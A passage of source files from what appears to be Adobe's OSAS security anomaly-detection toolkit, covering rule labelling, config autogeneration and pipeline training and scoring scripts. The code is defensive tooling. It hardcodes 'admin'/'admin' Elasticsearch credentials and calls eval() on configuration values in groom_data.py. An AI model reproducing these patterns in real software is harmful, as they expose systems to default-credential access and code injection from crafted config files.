 92 |                         compiled_regex=regex_cache[attribute_value]
 93 |                         if compiled_regex.match(item[attribute_name]):
 94 |                             found = True
 95 |                             break
 96 |                     if not found:
 97 |                         valid = False
 98 |                         break
 99 |                 if valid:
100 |                     scores[index] += rule_score
101 |                     if len(labels[index]) > 3:
102 |                         labels[index] = labels[index][:-1] + ', \'' + rule_label + '\']'
103 |                     else:
104 |                         labels[index] = '[\'{0}\']'.format(rule_label)
105 |         index += 1
106 | 
107 |     datasource['_labels'] = labels
108 | 
109 | 
110 | def process(params):
111 |     # load and run pipeline
112 |     rules_pack = _load_rules(params.rules_folder)
113 |     datasource = CSVDataSource(params.input_file)
114 |     _apply_rules(datasource, rules_pack)
115 | 
116 |     # save, if necessary
117 |     if params.output_file:
118 |         datasource.save(open(params.output_file, 'w'))
119 |     # push to elasticsearch
120 |     if not params.no_elastic:
121 |         try:
122 |             es = Elasticsearch([{'host': 'localhost', 'port': 9200}], http_auth=('admin', 'admin'))
123 |             data = [item for item in datasource]
124 |             helpers.bulk(es, data, index="anomalies", doc_type="type")
125 |         except Exception as e:
126 |             sys.stdout.write('Unable to push data to ElasticSearch:  {0}\n'.format(str(e)))
127 | 
128 | 
129 | if __name__ == '__main__':
130 |     parser = optparse.OptionParser()
131 |     parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
132 |     parser.add_option('--rules-folder', action='store', dest='rules_folder', help='location of rules')
133 |     parser.add_option('--output-file', action='store', dest='output_file', help='output-file (optional)')
134 |     parser.add_option('--no-elastic', action='store_true', dest='no_elastic', help='don\'t push data to Elastic')
135 |     (params, _) = parser.parse_args(sys.argv)
136 | 
137 |     if params.input_file and params.rules_folder:
138 |         if params.no_elastic and not params.output_file:
139 |             sys.stdout.write("This run will not produce any results. You need to either specify --output-file or "
140 |                              "remove --no-elastic\n")
141 |         else:
142 |             process(params)
143 |     else:
144 |         parser.print_help()
145 | 


--------------------------------------------------------------------------------
/src/osas/main/autoconfig.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # Authors: Security Intelligence Team within the Security Coordination Center
  3 | #
  4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
  5 | #
  6 | # Licensed under the Apache License, Version 2.0 (the "License");
  7 | # you may not use this file except in compliance with the License.
  8 | # You may obtain a copy of the License at
  9 | #
 10 | # http://www.apache.org/licenses/LICENSE-2.0
 11 | #
 12 | # Unless required by applicable law or agreed to in writing, software
 13 | # distributed under the License is distributed on an "AS IS" BASIS,
 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 15 | # See the License for the specific language governing permissions and
 16 | # limitations under the License.
 17 | #
 18 | 
 19 | import optparse
 20 | import sys
 21 | import inspect
 22 | 
 23 | sys.path.append('')
 24 | from osas.data.datasources import CSVDataSource
 25 | from osas.core import label_generators
 26 | 
 27 | 
 28 | def _get_type(val):
 29 |     try:
 30 |         x = int(val)
 31 |         return 'int'
 32 |     except:
 33 |         try:
 34 |             x = float(val)
 35 |             return 'float'
 36 |         except:
 37 |             if val is None:
 38 |                 return 'none'
 39 |             else:
 40 |                 return 'str'
 41 | 
 42 | 
 43 | def _detect_field_type(datasource, count_column=None):
 44 |     item = datasource[0]
 45 |     field_type = {key: 'int' for key in item}
 46 |     sys.stdout.write('\n')
 47 |     sys.stdout.flush()
 48 | 
 49 |     if count_column is None:
 50 |         count = len(datasource)
 51 |     else:
 52 |         count = 0
 53 | 
 54 |     for item in datasource:
 55 |         if count_column is not None:
 56 |             count += item[count_column]
 57 |         for key in item:
 58 |             t = _get_type(item[key])
 59 |             if t == 'float':
 60 |                 if field_type[key] == 'int':
 61 |                     field_type[key] = t
 62 |             elif t == 'str':
 63 |                 field_type[key] = t
 64 | 
 65 |     field2val = {}
 66 |     for item in datasource:
 67 |         for key in field_type:
 68 |             if field_type[key] == 'str' or field_type[key] == 'int' or field_type[key] == 'float':
 69 |                 value = item[key]
 70 |                 if key not in field2val:
 71 |                     field2val[key] = {}
 72 |                 if (len(field2val[key]) - 1) / count < 0.1:
 73 |                     if value not in field2val[key]:
 74 |                         field2val[key][value] = '1'
 75 |     for key in field2val:
 76 |         if len(field2val[key]) / count < 0.1:
 77 |             field_type[key] = 'multinomial'
 78 |         elif field_type[key] == 'str':
 79 |             field_type[key] = 'text'
 80 | 
 81 |     return field_type
 82 | 
 83 | 
 84 | def _get_generators(datasource: CSVDataSource, field_types: dict):
 85 |     generator_list = []
 86 |     for key in field_types:
 87 |         if field_types[key] == 'int' or field_types[key] == 'float':
 88 |             generator_list.append(['NumericField', [key]])
 89 |         if field_types[key] == 'multinomial':
 90 |             generator_list.append(['MultinomialField', [key]])
 91 |         if field_types[key] == 'text':
 92 |             generator_list.append(['TextField', [key]])
 93 |     assigned = {}
 94 |     for key1 in field_types:
 95 |         for key2 in field_types:
 96 |             if field_types[key1] == 'multinomial' and field_types[key2] == 'multinomial' and \
 97 |                     (key2, key1) not in assigned and key1 != key2:
 98 |                 generator_list.append(['MultinomialFieldCombiner', [key1, key2]])
 99 |                 assigned[(key1, key2)] = '1'
100 | 
101 |     generator_list = list(sorted(generator_list, key=lambda x: x[0]))
102 | 
103 |     return generator_list
104 | 
105 | 
106 | HEADER = """; OSAS autogenerated configuration file
107 | ;
108 | ; Below we provide a list of standard label generator templates - feel free to copy-paste and edit them
109 | ; in order to cope with your own dataset
110 | ;
111 | 
112 | ; [LG_MULTINOMIAL]
113 | ; generator_type = MultinomialField
114 | ; field_name = <FIELD_NAME>
115 | ; absolute_threshold = 10
116 | ; relative_threshold = 0.1
117 | 
118 | ; [LG_TEXT]
119 | ; generator_type = TextField
120 | ; field_name = <FIELD_NAME>
121 | ; lm_mode = char
122 | ; ngram_range = (3, 5)
123 | 
124 | ; [LG_NUMERIC]
125 | ; generator_type = NumericField
126 | ; field_name = <FIELD_NAME>
127 | ; label_for_normal = False
128 | ; stdev = True
129 | ; stdev_borderline_threshold = 1
130 | ; stdev_outlier_threshold = 2
131 | ; spike = none # one of 'none', 'ratio', or 'fixed'
132 | ; spike_borderline_threshold = 10
133 | ; spike_outlier_threshold = 20
134 | 
135 | ; [LG_MUTLINOMIAL_COMBINER]
136 | ; generator_type = MultinomialFieldCombiner
137 | ; field_names = ['<FIELD_1>', '<FIELD_2>', ...]
138 | ; absolute_threshold = 10
139 | ; relative_threshold = 0.1
140 | 
141 | ; [LG_KEYWORD]
142 | ; generator_type = KeywordBased
143 | ; field_name = <FIELD_NAME>
144 | ; keyword_list = ['<KEYWORD_1>', '<KEYWORD_2>', '<KEYWORD_3>', ...]
145 | 
146 | ; [LG_REGEX]
147 | ; generator_type = KnowledgeBased
148 | ; field_name = <FIELD_NAME>
149 | ; rules_and_labels_tuple_list = [('<REGEX_1>','<LABEL_1>'), ('<REGEX_2>','<LABEL_2>'), ...]"""
150 | 
151 | 
152 | def _write_conf(generators, filename, count_column=None):
153 |     f = open(filename, 'w')
154 |     f.write(HEADER)
155 |     f.write('\n\n')
156 |     if params.count_column:
157 |         f.write('[GENERAL]\n')
158 |         f.write('count_column={0}\n\n'.format(count_column))
159 |     count = 0
160 |     for generator in generators:
161 |         count += 1
162 |         f.write('[LG_{0}]\n'.format(count))
163 |         f.write('generator_type = {0}\n'.format(generator[0]))
164 |         dyn_class = getattr(sys.modules[label_generators.__name__], generator[0])
165 | 
166 |         signature = inspect.signature(dyn_class.__init__)
167 |         for param in signature.parameters.items():
168 |             param_name = param[1].name
169 |             param_value = param[1].default
170 |             if param_name == 'self':
171 |                 continue
172 |             if param_name == 'field_name' or param_name == 'field_names':
173 |                 if len(generator[1]) == 1:
174 |                     param_value = generator[1][0]
175 |                 else:
176 |                     param_value = generator[1]
177 |             f.write('{0} = {1}\n'.format(param_name, param_value))
178 |         f.write('\n')
179 |     f.write('[AnomalyScoring]\nscoring_algorithm = StatisticalNGramAnomaly\n')
180 |     f.close()
181 | 
182 | 
183 | def process(params):
184 |     datasource = CSVDataSource(params.input_file)
185 |     sys.stdout.write('Preprocessing')
186 |     if params.count_column:
187 |         cc = params.count_column
188 |     else:
189 |         cc = None
190 |     field_type = _detect_field_type(datasource, count_column=cc)
191 |     sys.stdout.write('\t::Detected field types:\n')
192 |     for key in field_type:
193 |         sys.stdout.write('\t\t"{0}": {1}\n'.format(key, field_type[key]))
194 | 
195 |     generators = _get_generators(datasource, field_type)
196 |     sys.stdout.write('\t::Suggested generators:\n')
197 |     for item in generators:
198 |         sys.stdout.write('\t\t{0}: {1}\n'.format(item[0], item[1]))
199 | 
200 |     _write_conf(generators, params.output_file, count_column=params.count_column)
201 | 
202 | 
203 | if __name__ == '__main__':
204 |     parser = optparse.OptionParser()
205 |     parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
206 |     parser.add_option('--output-file', action='store', dest='output_file', help='location of the output file')
207 |     parser.add_option('--count-column', action='store', dest='count_column',
208 |                       help='if this value is set, OSAS will consider the data clustered and this column will indicate'
209 |                            'the number of occurrences of the event. Otherwise, this number is considered equal to 1')
210 |     (params, _) = parser.parse_args(sys.argv)
211 | 
212 |     if params.input_file and params.output_file:
213 |         process(params)
214 |     else:
215 |         parser.print_help()
216 | 


--------------------------------------------------------------------------------
/src/osas/main/run_pipeline.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # Authors: Security Intelligence Team within the Security Coordination Center
 3 | #
 4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
 5 | #
 6 | # Licensed under the Apache License, Version 2.0 (the "License");
 7 | # you may not use this file except in compliance with the License.
 8 | # You may obtain a copy of the License at
 9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 | 
19 | import optparse
20 | import sys
21 | import json
22 | from elasticsearch import helpers, Elasticsearch
23 | 
24 | sys.path.append('')
25 | 
26 | from src.osas.pipeline import Pipeline
27 | from osas.data.datasources import CSVDataSource, Datasource
28 | import numpy as np
29 | 
30 | 
31 | def is_numeric(obj):
32 |     attrs = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
33 |     return all(hasattr(obj, attr) for attr in attrs)
34 | 
35 | 
36 | def process(params):
37 |     # load and run pipeline
38 |     datasource = CSVDataSource(params.input_file)
39 |     p = Pipeline('DEV')
40 |     p.load_config(params.conf_file)
41 |     p.load_model(params.model_file)
42 |     p(datasource)
43 |     # save, if necessary
44 |     if params.output_file:
45 |         datasource.save(open(params.output_file, 'w'))
46 |     # push to elasticsearch
47 |     if not params.no_elastic:
48 |         try:
49 |             es = Elasticsearch([{'host': 'localhost', 'port': 9200}], http_auth=('admin', 'admin'))
50 |             data = [item for item in datasource]
51 |             for item in data:
52 |                 item['model'] = p._scoring_model_name
53 |                 item['raw'] = str(item['labels'])
54 |                 for key in item:
55 |                     if item[key] == 'NaN' or (is_numeric(item[key]) and np.isnan(item[key])):
56 |                         item[key] = None
57 |             helpers.bulk(es, data, index="anomalies", doc_type="type")
58 |         except Exception as e:
59 |             sys.stdout.write('Unable to push data to ElasticSearch:  {0}\n'.format(str(e)))
60 | 
61 | 
62 | if __name__ == '__main__':
63 |     parser = optparse.OptionParser()
64 |     parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
65 |     parser.add_option('--conf-file', action='store', dest='conf_file', help='location of pipeline configuration file')
66 |     parser.add_option('--model-file', action='store', dest='model_file', help='location of pretrained pipeline file')
67 |     parser.add_option('--output-file', action='store', dest='output_file', help='output-file (optional)')
68 |     parser.add_option('--no-elastic', action='store_true', dest='no_elastic', help='don\'t push data to Elastic')
69 |     (params, _) = parser.parse_args(sys.argv)
70 | 
71 |     if params.input_file and params.conf_file and params.model_file:
72 |         if params.no_elastic and not params.output_file:
73 |             sys.stdout.write("This run will not produce any results. You need to either specify --output-file or "
74 |                              "remove --no-elastic\n")
75 |         else:
76 |             process(params)
77 |     else:
78 |         parser.print_help()
79 | 


--------------------------------------------------------------------------------
/src/osas/main/train_pipeline.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # Authors: Security Intelligence Team within the Security Coordination Center
 3 | #
 4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
 5 | #
 6 | # Licensed under the Apache License, Version 2.0 (the "License");
 7 | # you may not use this file except in compliance with the License.
 8 | # You may obtain a copy of the License at
 9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 | 
19 | import optparse
20 | import sys
21 | import json
22 | 
23 | sys.path.append('')
24 | 
25 | from src.osas.pipeline import Pipeline
26 | from osas.data.datasources import CSVDataSource, Datasource
27 | 
28 | 
29 | def is_numeric(obj):
30 |     attrs = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
31 |     return all(hasattr(obj, attr) for attr in attrs)
32 | 
33 | 
34 | def process(params):
35 |     # load and run pipeline
36 |     datasource = CSVDataSource(params.input_file)
37 |     p = Pipeline('DEV')
38 |     p.load_config(params.conf_file)
39 |     if params.incremental:
40 |         p.load_model(params.orig_model_file)
41 |     model = p.build_pipeline(datasource, incremental=params.incremental)
42 |     json.dump(model, open(params.model_file, 'w'), indent=4)
43 | 
44 | 
45 | if __name__ == '__main__':
46 |     parser = optparse.OptionParser()
47 |     parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
48 |     parser.add_option('--conf-file', action='store', dest='conf_file', help='location of pipeline configuration file')
49 |     parser.add_option('--model-file', action='store', dest='model_file',
50 |                       help='location where to store the pretrained pipeline file')
51 |     parser.add_option('--orig-model-file', action='store', dest='orig_model_file',
52 |                       help='location where to store the pretrained pipeline file')
53 |     parser.add_option('--incremental', action='store_true', help='perform incremental update on the model (will load '
54 |                                                                  '--orig-model-file and save at location specified by '
55 |                                                                  '--model-file)')
56 | 
57 |     (params, _) = parser.parse_args(sys.argv)
58 | 
59 |     if params.input_file and params.conf_file and params.model_file:
60 |         if params.incremental and params.orig_model_file:
61 |             process(params)
62 |         else:
63 |             if params.incremental:
64 |                 print("Must specify --orig-model-file")
65 |             elif params.orig_model_file:
66 |                 print("--orig-model-file must be used with --incremental")
67 |             else:
68 |                 process(params)
69 |     else:
70 |         parser.print_help()
71 | 


--------------------------------------------------------------------------------
/src/osas/models/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/adobe/OSAS/46eded4bb2b60652fc59e59a17036fd38d494d4f/src/osas/models/__init__.py


--------------------------------------------------------------------------------
/src/osas/models/pipeline.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # Authors: Security Intelligence Team within the Security Coordination Center
 3 | #
 4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
 5 | #
 6 | # Licensed under the Apache License, Version 2.0 (the "License");
 7 | # you may not use this file except in compliance with the License.
 8 | # You may obtain a copy of the License at
 9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 | 
19 | import sys
20 | 
21 | sys.path.append('')
22 | from osas.core.interfaces import Datasource
23 | 
24 | 
25 | class CustomizablePipeline:
26 |     def __init__(self):
27 |         pass
28 | 
29 |     def __call__(self, dataset: Datasource) -> None:
30 |         pass
31 | 


--------------------------------------------------------------------------------
/src/osas/pipeline/README.md:
--------------------------------------------------------------------------------
1 | # Main pipeline folder
2 | 


--------------------------------------------------------------------------------
/src/osas/pipeline/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/adobe/OSAS/46eded4bb2b60652fc59e59a17036fd38d494d4f/src/osas/pipeline/__init__.py


--------------------------------------------------------------------------------
/src/osas/pipeline/detect_anomalies.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # Authors: Security Intelligence Team within the Security Coordination Center
 3 | #
 4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
 5 | #
 6 | # Licensed under the Apache License, Version 2.0 (the "License");
 7 | # you may not use this file except in compliance with the License.
 8 | # You may obtain a copy of the License at
 9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 | 
19 | import os
20 | import sys
21 | 
22 | sys.path.append('')
23 | 
24 | from osas.core import anomaly
25 | from osas.io_utils import config
26 | from osas.core.interfaces import AnomalyDetection, Datasource
27 | 
28 | 
29 | class DetectAnomalies():
30 |     ''' class for anomalies detection wrapper methods '''
31 | 
32 |     def __init__(self, env: str = 'DEV'):
33 |         os.environ["OSAS_ENV"] = env
34 | 
35 |     def detection_model(self, name: str, load_config: bool = False):
36 |         '''get model specified by name'''
37 |         # get anomaly detection type by name
38 |         dmClass = getattr(sys.modules[anomaly.__name__], name)
39 |         # get label gen obj
40 |         dm = dmClass()
41 |         return dm
42 | 
43 |     def build_model(self, model: AnomalyDetection, dataset: Datasource) -> dict:
44 |         return model.build_model(dataset)
45 | 
46 |     def get_scores(self, model: AnomalyDetection, dataset: Datasource) -> [float]:
47 |         return model.__call__(dataset)
48 | 
49 |     def get_pretrained_model(self, modelName: str, pretrained_data: str) -> AnomalyDetection:
50 |         dmClass = getattr(sys.modules[anomaly.__name__], modelName)
51 |         return dmClass.from_pretrained(pretrained_data)
52 | 


--------------------------------------------------------------------------------
/src/osas/pipeline/fetch_data.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # Authors: Security Intelligence Team within the Security Coordination Center
 3 | #
 4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
 5 | #
 6 | # Licensed under the Apache License, Version 2.0 (the "License");
 7 | # you may not use this file except in compliance with the License.
 8 | # You may obtain a copy of the License at
 9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 | 
19 | import os
20 | import sys
21 | 
22 | sys.path.append('')
23 | 
24 | from src.osas.pipeline import Pipeline
25 | from osas.data import datasources
26 | from osas.core.interfaces import Datasource
27 | from osas.io_utils import config
28 | 
29 | 
30 | class FetchData(Pipeline):
31 |     ''' class for data fetching '''
32 | 
33 |     def __init__(self, env: str):
34 |         Pipeline.__init__(self, env)
35 |         os.environ["UBA_ENV"] = env
36 | 
37 |     def datasource(self, name: str, load_config: str=None) -> Datasource:
38 |         '''datasource generic method'''
39 |         dsClass = getattr(sys.modules[datasources.__name__], name)
40 |         # get args for datasource
41 |         cfg = getattr(sys.modules[config.__name__], name)()
42 |         if load_config:
43 |             cfg.load(load_config)
44 |         ds = dsClass(**(vars(cfg)))  # convert obj to dict to kwargs
45 |         return ds
46 | 


--------------------------------------------------------------------------------
/src/osas/pipeline/groom_data.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # Authors: Security Intelligence Team within the Security Coordination Center
  3 | #
  4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
  5 | #
  6 | # Licensed under the Apache License, Version 2.0 (the "License");
  7 | # you may not use this file except in compliance with the License.
  8 | # You may obtain a copy of the License at
  9 | #
 10 | # http://www.apache.org/licenses/LICENSE-2.0
 11 | #
 12 | # Unless required by applicable law or agreed to in writing, software
 13 | # distributed under the License is distributed on an "AS IS" BASIS,
 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 15 | # See the License for the specific language governing permissions and
 16 | # limitations under the License.
 17 | #
 18 | 
 19 | import os
 20 | import sys
 21 | import json
 22 | 
 23 | sys.path.append('')
 24 | 
 25 | # from osas.pipeline.pipeline import Pipeline
 26 | from osas.core import label_generators
 27 | from osas.io_utils import config
 28 | from osas.core.interfaces import LabelGenerator, Datasource
 29 | import configparser
 30 | 
 31 | 
 32 | class GroomData():
 33 |     ''' class for data grooming wrapper methods '''
 34 | 
 35 |     def __init__(self, env: str = 'DEV'):
 36 |         # Pipeline.__init__(self, env)
 37 |         os.environ["OSAS_ENV"] = env
 38 | 
 39 |     def label_generator(self, name: str,
 40 |                         load_config: str = None) -> LabelGenerator:
 41 |         '''generate label specified by name'''
 42 |         # get label generator class from name
 43 |         lgClass = getattr(sys.modules[label_generators.__name__], name)
 44 |         # get args for the label generator
 45 |         cfg = getattr(sys.modules[config.__name__], name)()
 46 |         if load_config:
 47 |             if isinstance(load_config, configparser.SectionProxy):
 48 |                 cfg = load_config
 49 |             else:
 50 |                 cfg.load(load_config)
 51 |         # get label gen obj
 52 |         # di = {key: eval(cfg[key]) for key in cfg}
 53 |         di = {}
 54 |         for key in cfg:
 55 |             try:
 56 |                 val = eval(cfg[key])
 57 |             except:
 58 |                 val = cfg[key]
 59 |             di[key] = val
 60 |         del di['generator_type']
 61 |         lg = lgClass(**di)  # convert obj to dict to kwargs
 62 |         return lg
 63 | 
 64 |     def from_pretrained(self, name: str,
 65 |                         pretrained: dict) -> LabelGenerator:
 66 |         '''generate label specified by name'''
 67 |         # get label generator class from name
 68 |         lgClass = getattr(sys.modules[label_generators.__name__], name)
 69 |         # get args for the label generator
 70 |         cfg = getattr(sys.modules[config.__name__], name)()
 71 |         return lgClass.from_pretrained(json.dumps(pretrained))
 72 |         # if load_config:
 73 |         #     if isinstance(load_config, configparser.SectionProxy):
 74 |         #         cfg = load_config
 75 |         #     else:
 76 |         #         cfg.load(load_config)
 77 |         # # get label gen obj
 78 |         # # di = {key: eval(cfg[key]) for key in cfg}
 79 |         # di = {}
 80 |         # for key in cfg:
 81 |         #     try:
 82 |         #         val = eval(cfg[key])
 83 |         #     except:
 84 |         #         val = cfg[key]
 85 |         #     di[key] = val
 86 |         # del di['generator_type']
 87 |         # lg = lgClass(**di)  # convert obj to dict to kwargs
 88 |         # return lg
 89 | 
 90 |     def build_model(self, model: LabelGenerator,
 91 |                     dataset: Datasource, count_column: str) -> dict:
 92 |         return model.build_model(dataset, count_column)
 93 | 
 94 |     def get_labels(self, model: LabelGenerator,
 95 |                    input_object: dict) -> [str]:
 96 |         return model.__call__(input_object)
 97 | 
 98 |     def get_pretrained_model(self, modelName: str,
 99 |                              pretrained_data: str) -> LabelGenerator:
100 |         lgClass = getattr(sys.modules[label_generators.__name__],
101 |                           modelName)
102 |         return lgClass.from_pretrained(pretrained_data)
103 | 


--------------------------------------------------------------------------------
/src/osas/pipeline/pipeline.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # Authors: Security Intelligence Team within the Security Coordination Center
  3 | #
  4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
  5 | #
  6 | # Licensed under the Apache License, Version 2.0 (the "License");
  7 | # you may not use this file except in compliance with the License.
  8 | # You may obtain a copy of the License at
  9 | #
 10 | # http://www.apache.org/licenses/LICENSE-2.0
 11 | #
 12 | # Unless required by applicable law or agreed to in writing, software
 13 | # distributed under the License is distributed on an "AS IS" BASIS,
 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 15 | # See the License for the specific language governing permissions and
 16 | # limitations under the License.
 17 | #
 18 | 
 19 | import configparser
 20 | import os
 21 | import sys
 22 | from ast import literal_eval
 23 | 
 24 | sys.path.append('')
 25 | from src.osas.pipeline import GroomData
 26 | from osas.data.datasources import CSVDataSource, Datasource
 27 | from src.osas.pipeline import DetectAnomalies
 28 | import json
 29 | 
 30 | 
 31 | class Pipeline:
 32 |     ''' base class contains all template methods '''
 33 |     env = None
 34 |     root_dir = None
 35 |     config = None
 36 | 
 37 |     def __init__(self, env):
 38 |         '''
 39 |         init args
 40 |         - obj
 41 |         - env var
 42 |         '''
 43 |         # global vars set as env vars
 44 |         Pipeline.env = env
 45 |         os.environ["OSAS_ENV"] = env  # PROD/STAGE/DEV
 46 |         curr_dir = os.path.dirname(os.path.realpath(__file__))
 47 |         Pipeline.root_dir = os.path.realpath(os.path.join(curr_dir, "../"))
 48 |         self._pipeline = []
 49 |         self._detect_anomalies = None
 50 |         self._count_column = None
 51 | 
 52 |     def load_config(self, config_file, env='DEV'):
 53 |         '''
 54 |         load configs
 55 |         args:
 56 |         - obj
 57 |         - configfile path
 58 |         - env
 59 |         '''
 60 |         with open(config_file, "r") as f:
 61 |             cfg = configparser.RawConfigParser()
 62 |             cfg.read_file(f)
 63 |             self.config = cfg
 64 | 
 65 |         self._scoring_model_name = self.config['AnomalyScoring']['scoring_algorithm']
 66 | 
 67 |         if 'GENERAL' in self.config:
 68 |             if 'count_column' in self.config['GENERAL']:
 69 |                 self._count_column = self.config['GENERAL']['count_column']
 70 | 
 71 |     def load_model(self, model_file, env='DEV'):
 72 |         '''
 73 |         Loads a pretrained model for the current configuration
 74 |         :param model_file: json file where pretrained model was stored
 75 |         :param env: environment type
 76 |         :return: None
 77 |         '''
 78 |         pretrained = json.load(open(model_file))
 79 |         gd = GroomData()
 80 |         self._pipeline = []
 81 |         for sect in self.config:
 82 |             print('\t::{0}'.format(sect))
 83 |             if 'generator_type' in self.config[sect]:
 84 |                 self._pipeline.append(gd.from_pretrained(self.config[sect]['generator_type'],
 85 |                                                          pretrained['model'][sect]))
 86 |         da = DetectAnomalies()
 87 |         self._detect_anomalies = da.get_pretrained_model(self._scoring_model_name, json.dumps(pretrained['scoring']))
 88 | 
 89 |     def build_pipeline(self, dataset: Datasource, incremental=False) -> dict:
 90 |         '''
 91 |         Generates a JSON serializable object that contains data for all pretrained label generators
 92 |         :param dataset: dataset to train the model on
 93 |         :return: serializable dict object
 94 |         '''
 95 |         gd = GroomData()
 96 |         ex_pipeline = self._pipeline
 97 |         self._pipeline = []
 98 |         final_model = {'model': {}}
 99 |         index = 0
100 |         for sect in self.config:
101 |             print('\t::{0}'.format(sect))
102 |             if 'generator_type' in self.config[sect]:
103 |                 for key in self.config[sect]:
104 |                     print("\t\t::{0} = {1}".format(key, self.config[sect][key]))
105 |                 if incremental:
106 |                     lg = ex_pipeline[index]
107 |                 else:
108 |                     lg = gd.label_generator(self.config[sect]['generator_type'], self.config[sect])
109 |                 index += 1
110 |                 print("\t\t::OBJECT: {0}".format(lg))
111 |                 sys.stdout.write('\t\t::BUILDING MODEL...')
112 |                 sys.stdout.flush()
113 |                 lg_model = gd.build_model(lg, dataset, count_column=self._count_column)
114 |                 final_model['model'][sect] = lg_model
115 |                 sys.stdout.write('done\n')
116 |                 self._pipeline.append(lg)
117 |         # remove anomaly detection update (not all models support incremental because of sklearn dependencies)
118 |         # if incremental:
119 |         #     final_model['scoring'] = self._detect_anomalies
120 |         #     return final_model
121 | 
122 |         self(dataset, dest_field_labels='_labels')
123 |         da = DetectAnomalies()
124 |         if not incremental:
125 |             self._detect_anomalies = da.detection_model(self.config['AnomalyScoring']['scoring_algorithm'],
126 |                                                         load_config=False)
127 |         # check for classifier scoring and if so, add grouth truth column and classifier as param
128 |         if self.config['AnomalyScoring']['scoring_algorithm'] == 'SupervisedClassifierAnomaly':
129 |             ground_truth_column = self.config['AnomalyScoring']['ground_truth_column']
130 |             classifier = self.config['AnomalyScoring']['classifier']
131 |             # grab function args for model init from rest of conf variables
132 |             init_args = dict(self.config['AnomalyScoring'])
133 |             del init_args['scoring_algorithm']
134 |             del init_args['ground_truth_column']
135 |             del init_args['classifier']
136 |             # convert config values to inferred types, safely
137 |             for k in init_args:
138 |                 try:
139 |                     init_args[k] = literal_eval(init_args[k])
140 |                 except:
141 |                     # it will be a string otherwise
142 |                     pass
143 |             # build model
144 |             scoring_model = self._detect_anomalies.build_model(dataset,
145 |                                                                ground_truth_column,
146 |                                                                classifier,
147 |                                                                init_args,
148 |                                                                incremental=incremental)
149 |         else:
150 |             scoring_model = self._detect_anomalies.build_model(dataset, incremental=incremental)
151 |         final_model['scoring'] = scoring_model
152 |         return final_model
153 | 
154 |     def __call__(self, dataset: Datasource, dest_field_labels='labels', dest_field_score='score'):
155 |         all_labels = []
156 |         for item in dataset:
157 |             label_list = []
158 |             for lg in self._pipeline:
159 |                 llist = lg(item)
160 |                 for label in llist:
161 |                     label_list.append(label)
162 |             all_labels.append(label_list)
163 |         dataset[dest_field_labels] = all_labels
164 |         dataset['_labels'] = all_labels
165 |         if self._detect_anomalies is not None:
166 |             scores = self._detect_anomalies(dataset)
167 |             dataset[dest_field_score] = scores
168 | 
169 | 
170 | if __name__ == '__main__':
171 |     p = Pipeline('DEV')
172 |     p.load_config('tests/pipeline_test.conf')
173 |     import time
174 | 
175 |     ts1 = time.time()
176 |     datasource = CSVDataSource('tests/test_small.csv')
177 |     ts2 = time.time()
178 |     pipeline_model = p.build_pipeline(datasource)
179 |     ts3 = time.time()
180 |     p(datasource)
181 |     ts4 = time.time()
182 |     json.dump(pipeline_model, open('tests/pipeline.json', 'w'), indent=4)
183 |     for item in datasource[:10]:
184 |         print(item)
185 |         print()
186 |         print()
187 | 
188 |     print(
189 |         "Timing:\n\tLoad dataset: {0}\n\tBuild pipeline: {1}\n\tApply models:{2}\n\tDataset size: {3} entries\n".format(
190 |             ts2 - ts1, ts3 - ts2, ts4 - ts3, len(datasource)))
